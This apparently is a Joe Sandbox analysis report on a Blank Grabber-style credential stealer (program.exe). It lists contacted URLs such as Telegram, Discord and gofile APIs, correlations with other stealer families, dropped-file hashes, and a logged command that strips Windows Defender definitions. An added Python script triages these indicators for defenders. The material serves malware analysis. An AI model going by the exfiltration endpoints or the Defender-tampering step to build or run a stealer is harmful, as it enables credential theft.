https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples | program.exe, 00000001.00000003.2001942691.000001B5FF1DB000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2000411427.000001B5FF20B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.python.org/psf/license/) | program.exe, 00000001.00000002.2118655051.00007FFDFB868000.00000040.00000001.01000000.00000004.sdmp | false | | high
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py | program.exe, 00000001.00000002.2104884154.000001B5FC007000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.google.com/ | program.exe, 00000001.00000002.2107834839.000001B5FE980000.00000004.00001000.00020000.00000000.sdmp | false | | high
                                                                                                                                            https://www.iqiyi.com/program.exe, 00000001.00000002.2107834839.000001B5FE91C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://api.telegram.org/bot0program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://foss.heptapod.net/pypy/pypy/-/issues/3539program.exe, 00000001.00000002.2107071806.000001B5FE450000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.program.exe, 00000001.00000002.2105467796.000001B5FDC50000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2106525715.000001B5FE33B000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1784927173.000001B5FE333000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1848691520.000001B5FE333000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2002183639.000001B5FE33B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://google.com/program.exe, 00000001.00000003.1784927173.000001B5FE301000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2105467796.000001B5FDC50000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2106483905.000001B5FE310000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1848103473.000001B5FE301000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFprogram.exe, 00000001.00000003.1784927173.000001B5FE3EF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1797522496.000001B5FE3EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://ocsp.sectigo.com0program.exe, 00000000.00000003.1707556625.000002641A640000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://tools.ietf.org/html/rfc7231#section-4.3.6)program.exe, 00000001.00000002.2105467796.000001B5FDC50000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsNprogram.exe, 00000001.00000003.1784927173.000001B5FE301000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2106483905.000001B5FE310000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1848103473.000001B5FE301000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://contoso.com/Licensepowershell.exe, 0000002A.00000002.1981454462.000001E9C1E5D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://discordapp.com/api/v9/users/program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_sourceprogram.exe, 00000001.00000002.2105086608.000001B5FD894000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=program.exe, 00000001.00000003.2001533642.000001B5FE416000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_specprogram.exe, 00000001.00000002.2105086608.000001B5FD810000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://github.com/urllib3/urllib3/issues/2920program.exe, 00000001.00000002.2107675447.000001B5FE7A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17program.exe, 00000001.00000003.2000044221.000001B5FF37B000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2000411427.000001B5FF22F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#program.exe, 00000000.00000003.1707556625.000002641A640000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_dataprogram.exe, 00000001.00000002.2104884154.000001B5FC007000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://yahoo.com/program.exe, 00000001.00000002.2105467796.000001B5FDC50000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2105467796.000001B5FDCC2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://account.bellmedia.cprogram.exe, 00000001.00000002.2114614682.000001B5FFA7C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://schemas.mic;powershell.exe, 00000008.00000002.1917964780.000001A853E10000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                    unknown
                                                                                                                                                                                    http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6program.exe, 00000001.00000003.2002700653.000001B5FE1F1000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2103489320.000001B5FE1EA000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1850937625.000001B5FE1ED000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2105991946.000001B5FE1F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://login.microsoftonline.comprogram.exe, 00000001.00000002.2107834839.000001B5FE91C000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000001.00000002.2114614682.000001B5FFA64000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        http://crl.thawte.com/ThawteTimestampingCA.crl0program.exe, 00000000.00000003.1707556625.000002641A640000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://html.spec.whatwg.org/multipage/program.exe, 00000001.00000003.1784927173.000001B5FE301000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2106483905.000001B5FE310000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1848103473.000001B5FE301000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://www.ifeng.com/program.exe, 00000001.00000002.2107834839.000001B5FE91C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsprogram.exe, 00000001.00000002.2107318473.000001B5FE680000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://www.zhihu.com/program.exe, 00000001.00000002.2107834839.000001B5FE980000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installprogram.exe, 00000001.00000003.2001942691.000001B5FF1DB000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2000411427.000001B5FF20B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchprogram.exe, 00000001.00000003.2001533642.000001B5FE416000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://www.rfc-editor.org/rfc/rfc8259#section-8.1program.exe, 00000001.00000002.2105467796.000001B5FDC50000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1784927173.000001B5FE333000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1848691520.000001B5FE333000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://contoso.com/powershell.exe, 0000002A.00000002.1981454462.000001E9C1E5D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://oneget.orgXpowershell.exe, 0000002A.00000002.1908908412.000001E9B3434000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://api.gofile.io/getServerprogram.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngprogram.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.1906355908.000001A84B996000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1981454462.000001E9C1FA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1908908412.000001E9B374D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1981454462.000001E9C1E5D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 0000002A.00000002.1908908412.000001E9B3434000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://sectigo.com/CPS0program.exe, 00000000.00000003.1707556625.000002641A640000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/program.exe, 00000001.00000003.1754035626.000001B5FE3BD000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1848691520.000001B5FE3AF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1759827513.000001B5FE3BD000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2106760693.000001B5FE3B1000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2103757155.000001B5FE3AE000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1799365735.000001B5FE3BD000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1784927173.000001B5FE3BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | | 53334 | TUT-ASUS | false
162.159.137.232 | discord.com | United States | | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1557107
Start date and time: 2024-11-17 11:21:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 13m 9s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 103
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: program.exe
Detection: MAL
Classification: mal100.rans.troj.adwa.spyw.expl.evad.winEXE@164/56@2/2
EGA Information:
• Successful, ratio: 60%
                                                                                                                                                                                                                        HCA Information:Failed
                                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 216.58.206.67
                                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, gstatic.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                        • Execution Graph export aborted for target powershell.exe, PID 7512 because it is empty
                                                                                                                                                                                                                        • Execution Graph export aborted for target powershell.exe, PID 8260 because it is empty
                                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                        • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time     | Type            | Description
05:22:07 | API Interceptor | 165x Sleep call for process: powershell.exe modified
05:22:07 | API Interceptor | 5x Sleep call for process: WMIC.exe modified
Match: 208.95.112.1
Associated sample name / URL | Detection | Threat name    | Context
skuld.exe                    | malicious | Skuld Stealer  | ip-api.com/line/?fields=hosting
SolaraBostrappers.exe        | malicious | DCRat          | ip-api.com/line/?fields=hosting
svhost.exe                   | malicious | DCRat          | ip-api.com/line/?fields=hosting
Midnight.exe                 | malicious | XWorm          | ip-api.com/line/?fields=hosting
exe030.exe                   | malicious | XWorm          | ip-api.com/line/?fields=hosting
GRAINS.vbs                   | malicious | AgentTesla     | ip-api.com/line/?fields=hosting
SAMPLE_PHOTO.js              | malicious | AgentTesla     | ip-api.com/line/?fields=hosting
RuntimeusererVers.exe        | malicious | Python Stealer | ip-api.com/json
HeilHitler.exe               | malicious | Blank Grabber  | ip-api.com/json/?fields=225545
akame.exe                    | malicious | Blank Grabber  | ip-api.com/line/?fields=hosting
Match: discord.com
Associated sample name / URL | Detection | Threat name                                      | Context
RuntimeusererVers.exe        | malicious | Python Stealer                                   | 162.159.138.232
NEVER OPEN!.exe              | malicious | Python Stealer, Empyrean, Discord Token Stealer  | 162.159.137.232
HeilHitler.exe               | malicious | Blank Grabber                                    | 162.159.128.233
file.exe                     | malicious | CStealer                                         | 162.159.138.232
B78DGDwttv.exe               | malicious | SilverRat                                        | 162.159.135.232
YDW0S5K7hi.exe               | malicious | SilverRat                                        | 162.159.137.232
cDRgXaadjD.exe               | malicious | SilverRat                                        | 162.159.128.233
dens.exe                     | malicious | Python Stealer, Exela Stealer, Waltuhium Grabber | 162.159.128.233
Xyq6rvzLJs.exe               | malicious | SilverRat                                        | 162.159.137.232
00514DIRyT.exe               | malicious | GO Stealer                                       | 162.159.136.232
Match: ip-api.com
Associated sample name / URL | Detection | Threat name    | Context
skuld.exe                    | malicious | Skuld Stealer  | 208.95.112.1
SolaraBostrappers.exe        | malicious | DCRat          | 208.95.112.1
svhost.exe                   | malicious | DCRat          | 208.95.112.1
Midnight.exe                 | malicious | XWorm          | 208.95.112.1
exe030.exe                   | malicious | XWorm          | 208.95.112.1
GRAINS.vbs                   | malicious | AgentTesla     | 208.95.112.1
SAMPLE_PHOTO.js              | malicious | AgentTesla     | 208.95.112.1
RuntimeusererVers.exe        | malicious | Python Stealer | 208.95.112.1
HeilHitler.exe               | malicious | Blank Grabber  | 208.95.112.1
akame.exe                    | malicious | Blank Grabber  | 208.95.112.1
Match: CLOUDFLARENETUS
Associated sample name / URL | Detection | Threat name                                                          | Context
skuld.exe                    | malicious | Skuld Stealer                                                        | 104.26.13.205
file.exe                     | malicious | LummaC                                                               | 188.114.96.3
file.exe                     | malicious | LummaC                                                               | 188.114.97.3
Setup.exe                    | malicious | LummaC                                                               | 104.21.25.202
file.exe                     | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar           | 188.114.96.3
file.exe                     | malicious | LummaC                                                               | 188.114.96.3
file.exe                     | malicious | LummaC                                                               | 188.114.97.3
file.exe                     | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar                        | 188.114.97.3
file.exe                     | malicious | LummaC                                                               | 188.114.97.3
file.exe                     | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar    | 188.114.96.3
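The correlation tables above pivot on infrastructure that many unrelated families share: 208.95.112.1 is the address behind ip-api.com, discord.com resolves to Cloudflare anycast addresses, and CLOUDFLARENETUS is an entire ASN. The following is an added triage example written for this page; it is not code from Joe Sandbox or from the report. CORRELATIONS is a hand-transcribed subset of the tables (sample names only, since the hashes are not reproduced here, so a generic name such as file.exe may cover several distinct binaries). The fidelity thresholds, the SHARED_SERVICES list and the reading of an ip-api.com request limited to `fields=hosting` as an environment check (the `hosting` field reports whether the caller's IP belongs to a datacenter) are the editor's assumptions, not statements made by the report.

```python
"""Triage the "associated samples" pivots from a sandbox report.

Added example for this page, not Joe Sandbox code.  CORRELATIONS is a
constructed subset of the Match / Associated Sample tables; thresholds,
SHARED_SERVICES and the `hosting` interpretation are assumptions.
"""
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# (indicator kind, matched indicator, associated sample, sandbox threat label).
# Constructed from the report tables; no hashes, so "file.exe" may be several binaries.
CORRELATIONS = [
    ("ip", "208.95.112.1", "skuld.exe", "Skuld Stealer"),
    ("ip", "208.95.112.1", "SolaraBostrappers.exe", "DCRat"),
    ("ip", "208.95.112.1", "Midnight.exe", "XWorm"),
    ("ip", "208.95.112.1", "GRAINS.vbs", "AgentTesla"),
    ("ip", "208.95.112.1", "HeilHitler.exe", "Blank Grabber"),
    ("ip", "208.95.112.1", "akame.exe", "Blank Grabber"),
    ("domain", "discord.com", "RuntimeusererVers.exe", "Python Stealer"),
    ("domain", "discord.com", "HeilHitler.exe", "Blank Grabber"),
    ("domain", "discord.com", "file.exe", "CStealer"),
    ("domain", "discord.com", "B78DGDwttv.exe", "SilverRat"),
    ("domain", "ip-api.com", "skuld.exe", "Skuld Stealer"),
    ("domain", "ip-api.com", "Midnight.exe", "XWorm"),
    ("domain", "ip-api.com", "HeilHitler.exe", "Blank Grabber"),
    ("domain", "ip-api.com", "akame.exe", "Blank Grabber"),
    ("asn", "CLOUDFLARENETUS", "skuld.exe", "Skuld Stealer"),
    ("asn", "CLOUDFLARENETUS", "file.exe", "LummaC"),
]

# Public services that unrelated malware (and benign software) contact routinely.
# Assumption: behavioural context, not blockable C2 infrastructure.
SHARED_SERVICES = {"ip-api.com", "208.95.112.1", "discord.com"}


def family_spread(correlations):
    """Map each indicator to the set of distinct threat labels it was seen with."""
    spread = defaultdict(set)
    for _kind, indicator, _sample, threat in correlations:
        spread[indicator].add(threat)
    return dict(spread)


def classify_indicator(kind, indicator, families, max_families=2):
    """Return "high", "medium" or "low" blocklist fidelity for one pivot.

    An ASN names a hosting provider, not an actor.  A shared public service, or
    an indicator seen with more than `max_families` unrelated families, is a hunt
    pivot rather than a blocklist entry.  The threshold is an assumption.
    """
    if kind == "asn" or indicator in SHARED_SERVICES:
        return "low"
    if len(families) > max_families:
        return "low"
    return "high" if len(families) == 1 else "medium"


def rank_related_samples(correlations, our_family):
    """Rank associated samples by how many of our indicators they share.

    Returns (sample, shared indicator count, carries our family label), most
    shared first, same-family first on ties, then by sample name.
    """
    shared, labels = defaultdict(set), defaultdict(set)
    for _kind, indicator, sample, threat in correlations:
        shared[sample].add(indicator)
        labels[sample].add(threat)
    ranked = [(s, len(inds), our_family in labels[s]) for s, inds in shared.items()]
    ranked.sort(key=lambda r: (-r[1], not r[2], r[0]))
    return ranked


def is_hosting_probe(url):
    """True when a URL asks ip-api.com only for the `hosting` field.

    Editor's interpretation: such a request checks whether the caller runs on a
    datacenter/VPS address (sandbox evasion), not where it is.  A numeric
    `fields=` bitmask such as 225545 is not decoded and yields False.
    """
    if "://" not in url:
        url = "http://" + url
    parts = urlsplit(url)
    if parts.hostname != "ip-api.com":
        return False
    fields = parse_qs(parts.query).get("fields", [])
    return any(f.strip().lower() == "hosting" for f in fields)


if __name__ == "__main__":
    kinds = {ind: kind for kind, ind, _s, _t in CORRELATIONS}
    for ind, fams in family_spread(CORRELATIONS).items():
        print(f"{ind:16} {len(fams)} families -> {classify_indicator(kinds[ind], ind, fams)}")
    for sample, n, same in rank_related_samples(CORRELATIONS, "Blank Grabber")[:3]:
        print(f"{sample:16} shares {n} indicator(s); same family: {same}")
    print(is_hosting_probe("ip-api.com/line/?fields=hosting"))
```

Run against the transcribed rows, every pivot in this report classifies as low fidelity, which is the practical caveat: none of these matches ties program.exe to a specific operator, but the sample ranking still surfaces HeilHitler.exe and akame.exe (the other Blank Grabber submissions) as the closest relatives, and the `fields=hosting` probe is a behaviour worth alerting on in combination with the Defender tampering listed in the signatures.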
Match: TUT-ASUS
Associated sample name / URL | Detection | Threat name    | Context
skuld.exe                    | malicious | Skuld Stealer  | 208.95.112.1
SolaraBostrappers.exe        | malicious | DCRat          | 208.95.112.1
svhost.exe                   | malicious | DCRat          | 208.95.112.1
Midnight.exe                 | malicious | XWorm          | 208.95.112.1
exe030.exe                   | malicious | XWorm          | 208.95.112.1
GRAINS.vbs                   | malicious | AgentTesla     | 208.95.112.1
https://t.ly/-kxCO           | malicious | Braodo         | 208.95.112.1
SAMPLE_PHOTO.js              | malicious | AgentTesla     | 208.95.112.1
RuntimeusererVers.exe        | malicious | Python Stealer | 208.95.112.1
HeilHitler.exe               | malicious | Blank Grabber  | 208.95.112.1
No context

Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match: C:\Users\user\AppData\Local\Temp\_MEI73082\VCRUNTIME140.dll
• 799Ox3XqxO.exe, Detection: malicious, Threat: RedLine
• XODc5nV1kC.exe, Detection: malicious, Threat: LummaC
• active.exe, Detection: malicious, Threat: Unknown
• Creal.exe, Detection: malicious, Threat: Creal Stealer
• #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe, Detection: malicious, Threat: Blank Grabber, Creal Stealer
• https://t.ly/Oppenheim0511, Detection: malicious, Threat: GO Backdoor
• B6EGeOHEFm.exe, Detection: malicious, Threat: Phemedrone Stealer
• Q60ZbERXWZ.exe, Detection: malicious, Threat: Phemedrone Stealer
• XCubQJqiz7.exe, Detection: malicious, Threat: Phemedrone Stealer
• MVPloader.exe, Detection: malicious, Threat: Blank Grabber
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 0.34726597513537405
Encrypted: false
SSDEEP: 3:Nlll:Nll
MD5: 446DD1CF97EABA21CF14D03AEBC79F27
SHA1: 36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256: A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512: A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious: false
Preview: @...e...........................................................

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category: dropped
Size (bytes): 725710
Entropy (8bit): 7.937509403546435
Encrypted: false
SSDEEP: 12288:xWby7gIV2hUp93yMw1HCiZAbuwADT/3RlqgVjOE9XKXIkgIWG4O55KBM4a3+x:xWO7V/eWAP/RlqajOE9m1gIYO56d
MD5: E3BC08EF28B09FA1C7F2E7641696D22A
SHA1: BD28A2D01A38E77918C258A6269C836D3B675E64
SHA-256: 69C00FABE1923F8ADD6FFCF644FEC390CD26F99289CE22050F8BCBDB53252113
SHA-512: 671EF5A1BFAE3B5BA36D6AD3CB97144A0E8AEF1D7904FB8E81837064619F3C59431948C19BB60275A78AF3439DCD7A7AAB029A53656BE2CE8D525D92395E2196
Malicious: false
Process: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe
File Type: RAR archive data, v5
Category: dropped
Size (bytes): 765118
Entropy (8bit): 7.999761300170289
Encrypted: true
SSDEEP: 12288:YxQNugnCHqQ64trFhs6beC4iitMNqSBCC8MinFphIxv/0/aV0EXL6:SGMygbZeC4i5N/CC8MinFeM/80EXL6
MD5: 7363E2ADF70AF9E78BF0200030B62056
SHA1: 09B7FC624E9BE7B591211A8897CB3948DFC009FA
SHA-256: 35205D775A6AD3A8CFD4D1FB6E0BDCB3A0F4984920258DE3484F8E4FEE24248D
SHA-512: A05FA7121C42C467E4CEA931A7379FC78993D488D311BCC0812F2110F4395A9013057AA58F496085D08998186F25D8F98257B10315A248C077E66D042DF71E34
Malicious: true
Process: C:\Program Files\Windows Defender\MpCmdRun.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: modified
Size (bytes): 894
Entropy (8bit): 3.1128058211127683
Encrypted: false
SSDEEP: 12:Q58KRBubdpkoPAGdjrZ214Zk9+MlWlLehW51IC421YI:QOaqdmOFdjr014++kWResLIs1YI
MD5: 842440903277CDCB52B4DF8F4B7687EF
SHA1: 7F0F7C418B1078E3AE63541AE06FC54736A32E3B
SHA-256: 959B04E1AAC24FAAAB7339C53AFAB478513AA08049B36E398E0B510725F2E22D
SHA-512: 83C4E0E633CE1581CC3D0AD49F330FF5A24B9AD7B2FC9ABC08E1A3F83405362FA658FD84D1C6047851EA66013AFBA6817620624B3C63DF0D446913C3BCA76067
Malicious: false
Preview (UTF-16 text decoded):
-------------------------------------------------------------------------------------
MpCmdRun: Command Line: "C:\Program Files\Windows Defender\MpCmdRun.exe"  -RemoveDefinitions -All
 Start Time: Sun Nov 17 2024 05:22:25

MpEnsureProcessMitigationPolicy: hr = 0x1
Start: MpRemoveDefinitions(1)
MpCmdRun: End Time: Sun Nov 17 2024 05:22:25
-------------------------------------------------------------------------------------
Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type: Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b6, 9 symbols, created Sun Nov 17 11:58:08 2024, 1st section name ".debug$S"
Category: dropped
Size (bytes): 1372
Entropy (8bit): 4.120789688023344
Encrypted: false
SSDEEP: 24:HEFq9UZf3UOUDfHAwKefNqxNII+ycuZhNLRakSyWPNnqS+d:kvBkOSPKCNqu1ulLRa3yqqSe
MD5: 04A2EC094D01B7FACC270A1EAAAE9C88
SHA1: 3879B908422F1857226D50CE73A448AB478A7527
SHA-256: 247DFCA2019DD3DE5917E65F815FD0DD4BA299098FB142BE4184E8B87258C4AD
SHA-512: 4082305B54E86CA005CC10119549C7E6CA7A6020CD7C18C42F3FCB271E1BE4DA4A1A82756CC6E2AF47550E0A5B3A9B2015723F59C7CBFE60E1BFA00F69FD5D7E
Malicious: false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\program.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):120400
                                                                                                                                                                                                                                            Entropy (8bit):6.6017475353076716
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:N9TXF5LLXQLlNycKW+D4SdqJk6aN1ACuyxLiyazYaCVoecbdhgOwAd+zfZ1zu:N9jelDoD9uyxLizzFzecbdPwA87S
                                                                                                                                                                                                                                            MD5:862F820C3251E4CA6FC0AC00E4092239
                                                                                                                                                                                                                                            SHA1:EF96D84B253041B090C243594F90938E9A487A9A
                                                                                                                                                                                                                                            SHA-256:36585912E5EAF83BA9FEA0631534F690CCDC2D7BA91537166FE53E56C221E153
                                                                                                                                                                                                                                            SHA-512:2F8A0F11BCCC3A8CB99637DEEDA0158240DF0885A230F38BB7F21257C659F05646C6B61E993F87E0877F6BA06B347DDD1FC45D5C44BC4E309EF75ED882B82E4E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                                                                             • Filename: 799Ox3XqxO.exe, Detection: malicious
                                                                                                                                                                                                                                             • Filename: XODc5nV1kC.exe, Detection: malicious
